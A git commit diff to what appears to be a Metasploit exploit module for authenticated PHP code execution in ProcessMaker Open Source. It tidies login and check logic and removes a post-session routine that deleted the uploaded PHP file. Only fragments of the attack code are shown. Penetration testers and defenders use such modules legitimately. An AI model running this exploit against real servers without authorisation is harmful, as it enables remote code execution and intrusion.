Clean processmaker_exec
jvazquez-r7
parent
3eed800b85
commit
c4c171d63f
|
|
@ -15,12 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => "ProcessMaker Open Source Authenticated PHP Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a PHP code execution vulnerability in the
|
||||
This module exploits a PHP code execution vulnerability in the
|
||||
'neoclassic' skin for ProcessMaker Open Source which allows any
|
||||
authenticated user to execute PHP code.
|
||||
|
||||
The vulnerable skin is installed by default in version 2.x and
|
||||
cannot be removed via the web interface.
|
||||
authenticated user to execute PHP code. The vulnerable skin is
|
||||
installed by default in version 2.x and cannot be removed via
|
||||
the web interface.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
|
||||
|
|
@ -54,19 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
# Clean up on new session
|
||||
#
|
||||
def on_new_session(client)
|
||||
print_warning("#{peer} - Deleting #{@fname}")
|
||||
if client.type == "meterpreter"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
client.fs.file.rm(@fname)
|
||||
else
|
||||
client.shell_command_token("rm #{@fname}")
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Send command for execution
|
||||
#
|
||||
|
|
@ -116,11 +102,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
print_error("#{peer} - Connection failed")
|
||||
return false
|
||||
end
|
||||
if res and res.code == 200 and res.body =~ /Loading styles and images/
|
||||
print_good("#{peer} - Authenticated as user '#{user}'")
|
||||
return true
|
||||
else
|
||||
fail_with(Failure::NoAccess, "#{peer} - Authenticating as user '#{user}' failed")
|
||||
print_error("#{peer} - Authenticating as user '#{user}' failed")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
|
@ -130,7 +119,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
# login
|
||||
@cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
|
||||
login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
unless login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
# send check
|
||||
fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10)
|
||||
|
|
@ -140,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if res and res.body =~ /#{fingerprint}/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
elsif res
|
||||
return Exploit::CheckCode::Detected
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
print_error("#{peer} - Connection failed")
|
||||
|
|
@ -172,14 +163,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# login
|
||||
@cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
|
||||
login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
unless login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
|
||||
end
|
||||
|
||||
# upload payload
|
||||
@fname = "#{rand_text_alphanumeric(rand(10)+10)}.php"
|
||||
|
|
|
|||
Loading…
Reference in New Issue